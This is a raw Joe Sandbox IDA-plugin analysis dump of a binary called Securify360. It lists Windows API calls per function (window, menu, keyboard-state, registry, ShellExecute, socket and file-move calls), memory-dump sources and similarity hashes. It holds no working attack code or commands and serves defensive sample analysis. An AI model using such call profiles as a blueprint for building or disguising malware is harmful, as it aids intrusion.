                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 3648134473-3128320259
                                                                                              • Opcode ID: ee7c7ded106f178900bc2316e214a8573681fb7141a877c3ff3e6da4ab973e89
                                                                                              • Instruction ID: d7a3192e75b95f218b45027b25ef410ef14e55b87ff0aec166f004dade688efa
                                                                                              • Opcode Fuzzy Hash: ee7c7ded106f178900bc2316e214a8573681fb7141a877c3ff3e6da4ab973e89
                                                                                              • Instruction Fuzzy Hash: 9A0162F69403087FE7319BA09D89EF7736CEB08300F500595F799E2005EA79AE848B75
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0101DB42
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0101DB62
                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0101DD9D
                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0101DDBB
                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0101DDDC
                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 0101DDFB
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0101DE20
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0101DE43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                              • String ID:
                                                                                              • API String ID: 1211466189-0
                                                                                              • Opcode ID: eadd2c9f0fa3439dae265dbf24890027c58c58f3c20aaf9080169bee818463aa
                                                                                              • Instruction ID: 562766fa87131450d3839b4e449cb0e2fcf7fa84cd06f06c2614a7393ceaf620
                                                                                              • Opcode Fuzzy Hash: eadd2c9f0fa3439dae265dbf24890027c58c58f3c20aaf9080169bee818463aa
                                                                                              • Instruction Fuzzy Hash: 10B18B31600219EBDF14DFADC5897AE7BF1BF44701F0481A9ED889E289D779A950CB90
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101044E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3479070676-0
                                                                                              • Opcode ID: 326f9643d725a87e8a8a8c8227e011b7ba65735bb37016baae6ce7e52feab7d7
                                                                                              • Instruction ID: c5495a3e391b608863c454dba4277cda0556decff77d6d2c7b6a619f402091d2
                                                                                              • Opcode Fuzzy Hash: 326f9643d725a87e8a8a8c8227e011b7ba65735bb37016baae6ce7e52feab7d7
                                                                                              • Instruction Fuzzy Hash: EAA159702042019FDB21EF64C880F6EBBE5BF88314F14891DF5D69B296DB39E985DB42
                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000), ref: 00F92E9F
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000,000000FF), ref: 00F92EE7
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000), ref: 00FCC55B
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC508,00000004,00000000,00000000,00000000), ref: 00FCC5C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: 5b0bf5e8885c76693e8e4188922d5eda0254ad263756f2ec23b19461e62a5fe2
                                                                                              • Instruction ID: 437ecf22e63f577053c11547e7ae4ec89762f4faf382ecdee2e4f64e92e2e08f
                                                                                              • Opcode Fuzzy Hash: 5b0bf5e8885c76693e8e4188922d5eda0254ad263756f2ec23b19461e62a5fe2
                                                                                              • Instruction Fuzzy Hash: 58412935E04781BAEFB5AB29C9C8B7E7B92BB85320F68481DF48B43554C775A840F750
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 01016810
                                                                                              • GetDC.USER32(00000000), ref: 01016818
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01016823
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0101682F
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0101686B
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0101687C
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0101964F,?,?,000000FF,00000000,?,000000FF,?), ref: 010168B6
                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010168D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3864802216-0
                                                                                              • Opcode ID: f3ed97ea25959f6453266589a04eef9ffcf55041df3e88b8ccfb22e2b2ad257f
                                                                                              • Instruction ID: abbabc1ae39295b4bd548d9359bb2cdc684c642cf1fb605b3c0065b8ebb76266
                                                                                              • Opcode Fuzzy Hash: f3ed97ea25959f6453266589a04eef9ffcf55041df3e88b8ccfb22e2b2ad257f
                                                                                              • Instruction Fuzzy Hash: 25316D721012147FEB218F54CC89FEA3FA9EB49761F144155FE889A289C6BA9841CB74
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: fba0af77d38d4d3c6249bc6cc39fc147e363e81774f72fc9739fe134ce592303
                                                                                              • Instruction ID: f50eed7d652a476ebfd09c5edc118d9ab969587649f17b8a966a8f675916f361
                                                                                              • Opcode Fuzzy Hash: fba0af77d38d4d3c6249bc6cc39fc147e363e81774f72fc9739fe134ce592303
                                                                                              • Instruction Fuzzy Hash: 2B210777A012197A961475138E43FEB376EBE24754B080024FD069B302E718DE13AAE1
                                                                                              APIs
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                                • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                                                              • _wcstok.LIBCMT ref: 00FFF2D7
                                                                                              • _wcscpy.LIBCMT ref: 00FFF366
                                                                                              • _memset.LIBCMT ref: 00FFF399
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                              • String ID: X
                                                                                              • API String ID: 774024439-3081909835
                                                                                              • Opcode ID: aa021dd77adaaa9b8b31fa98531a6b3fdad5106bfbc3b55bc1127ed47dc422e3
                                                                                              • Instruction ID: 6463eb60d84cf9646d53dfce84a0111483715f781891656265d75508f16ec869
                                                                                              • Opcode Fuzzy Hash: aa021dd77adaaa9b8b31fa98531a6b3fdad5106bfbc3b55bc1127ed47dc422e3
                                                                                              • Instruction Fuzzy Hash: A0C1BF716083459FD724EF24C881A6FB7E4BF85350F04492DF99A872A1DB34EC09EB82
                                                                                              APIs
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 010072EB
                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0100730C
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0100731F
                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 010073D5
                                                                                              • inet_ntoa.WSOCK32(?), ref: 01007392
                                                                                                • Part of subcall function 00FEB4EA: _strlen.LIBCMT ref: 00FEB4F4
                                                                                                • Part of subcall function 00FEB4EA: _memmove.LIBCMT ref: 00FEB516
                                                                                              • _strlen.LIBCMT ref: 0100742F
                                                                                              • _memmove.LIBCMT ref: 01007498
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 3619996494-0
                                                                                              • Opcode ID: 3f0040cc569b5fa4a747fcb30bb532495ccab6ae03c103509b2ee85ec9a4a84f
                                                                                              • Instruction ID: 6f2b42095c3e77105bc77a47a7c0c8be6d3ba215486381a3bce892bcc5db2283
                                                                                              • Opcode Fuzzy Hash: 3f0040cc569b5fa4a747fcb30bb532495ccab6ae03c103509b2ee85ec9a4a84f
                                                                                              • Instruction Fuzzy Hash: 9081B071504300ABE721EB24CC81E6FBBE8EF84714F158558F5959B2D2DB78E902CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5f3838667f754ca3a4240e19ab6dd8682ff69b8f542427169c06916c627c451
                                                                                              • Instruction ID: 2e8c682244467cc56f620336219290b5547e57e858ac87bb59707be24c79a777
                                                                                              • Opcode Fuzzy Hash: f5f3838667f754ca3a4240e19ab6dd8682ff69b8f542427169c06916c627c451
                                                                                              • Instruction Fuzzy Hash: 42716E3590010AEFEF18CF98CC89EAE7B75FF85310F248159F965AA251C7349A51EFA0
                                                                                              APIs
                                                                                              • IsWindow.USER32(014A52E0), ref: 0101BA5D
                                                                                              • IsWindowEnabled.USER32(014A52E0), ref: 0101BA69
                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0101BB4D
                                                                                              • SendMessageW.USER32(014A52E0,000000B0,?,?), ref: 0101BB84
                                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 0101BBC1
                                                                                              • GetWindowLongW.USER32(014A52E0,000000EC), ref: 0101BBE3
                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0101BBFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                              • String ID:
                                                                                              • API String ID: 4072528602-0
                                                                                              • Opcode ID: 0a2e5bdd615db38761871139961e70e659e675ce346c3e2928bf0d077ae641f8
                                                                                              • Instruction ID: decea5b1c7ae6194426e191dc62fe3335a20053e2f35a548cc13de977b540a6f
                                                                                              • Opcode Fuzzy Hash: 0a2e5bdd615db38761871139961e70e659e675ce346c3e2928bf0d077ae641f8
                                                                                              • Instruction Fuzzy Hash: 9271BC35600204AFEB719F58C8D4FBABBF9FF09301F544099EAC597259CB7AA840DB60
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0100FB31
                                                                                              • _memset.LIBCMT ref: 0100FBFA
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0100FC3F
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                                • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                                                              • GetProcessId.KERNEL32(00000000), ref: 0100FCB6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0100FCE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3522835683-2766056989
                                                                                              • Opcode ID: b09566fdaed8dea0b310d704f5b646940f389827e4d3121c70517e16ec4b80e6
                                                                                              • Instruction ID: 6113b8ea50fbd38bb4c1d157e8e137826ba4448cbcfde90fee4394bb80d9b714
                                                                                              • Opcode Fuzzy Hash: b09566fdaed8dea0b310d704f5b646940f389827e4d3121c70517e16ec4b80e6
                                                                                              • Instruction Fuzzy Hash: 8361B074A00A199FDB21EF54C9919AEFBF4FF48314F148459E846AB391CB34AD42EF90
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 00FF178B
                                                                                              • GetKeyboardState.USER32(?), ref: 00FF17A0
                                                                                              • SetKeyboardState.USER32(?), ref: 00FF1801
                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FF182F
                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FF184E
                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FF1894
                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FF18B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 0bf5e013d0f329a69a0c2a6bc2a2f503156c518ec1bca803bfa1814fad4031cd
                                                                                              • Instruction ID: b736bf0d014f0dae40dad9f51a89a0105525df77eb6d10f8f4e0139efc6c5d45
                                                                                              • Opcode Fuzzy Hash: 0bf5e013d0f329a69a0c2a6bc2a2f503156c518ec1bca803bfa1814fad4031cd
                                                                                              • Instruction Fuzzy Hash: C151F561D087D9BDFB368634CC15BB67EE97F06310F088589E2D9558E2D2D8DC88E750
                                                                                              APIs
                                                                                              • GetParent.USER32(00000000), ref: 00FF15A4
                                                                                              • GetKeyboardState.USER32(?), ref: 00FF15B9
                                                                                              • SetKeyboardState.USER32(?), ref: 00FF161A
                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FF1646
                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FF1663
                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FF16A7
                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FF16C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: dfb5fb69eeeebea56426078028f1fa012451926b569d2771f67abd098208bab3
                                                                                              • Instruction ID: 3d883e3be9535e66d04667bcac93816238b63614c67afc2695663f881793d633
                                                                                              • Opcode Fuzzy Hash: dfb5fb69eeeebea56426078028f1fa012451926b569d2771f67abd098208bab3
                                                                                              • Instruction Fuzzy Hash: 0F5107A09047D9BDFB3287248C45B7A7EA97F06310F0C4589E2D9968E2C699EC84F750
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 2945705084-0
                                                                                              • Opcode ID: ede844bbcc1ead3c89be416fe45868b57d62f40df6ee68750a003a2c0ac735ba
                                                                                              • Instruction ID: 2f00fed1877405e2dcee25dcd2bdb1a9cbdf85d7353783cca57a08710db56739
                                                                                              • Opcode Fuzzy Hash: ede844bbcc1ead3c89be416fe45868b57d62f40df6ee68750a003a2c0ac735ba
                                                                                              • Instruction Fuzzy Hash: 4D41B266C5161875CB11FBB5CC469DFB3B8AF04310F508956F609E3122EB38E315DBA6
                                                                                              APIs
                                                                                                • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BE0
                                                                                                • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BF9
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00FF3BAA
                                                                                              • _wcscmp.LIBCMT ref: 00FF3BC6
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00FF3BDE
                                                                                              • _wcscat.LIBCMT ref: 00FF3C26
                                                                                              • SHFileOperationW.SHELL32(?), ref: 00FF3C92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1377345388-1173974218
                                                                                              • Opcode ID: bea873fcd2472bb30c1cce97ad204c0312ac0bbc8651058e542c170fdf231290
                                                                                              • Instruction ID: 8039a269d4a1f985a70fb12e1b99dcb4400e561ea962b8725f72aae2293bac15
                                                                                              • Opcode Fuzzy Hash: bea873fcd2472bb30c1cce97ad204c0312ac0bbc8651058e542c170fdf231290
                                                                                              • Instruction Fuzzy Hash: 8941A57150C3489AC751EF64C881AEFB7ECAF89350F50092EF689C3161EB38D688D752
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 010178CF
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017976
                                                                                              • IsMenu.USER32(?), ref: 0101798E
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010179D6
                                                                                              • DrawMenuBar.USER32 ref: 010179E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 3866635326-4108050209
                                                                                              • Opcode ID: fca86ce7ca20adf54e4a9525b48b132d10247fa5f250f348f423faeea23f6c4c
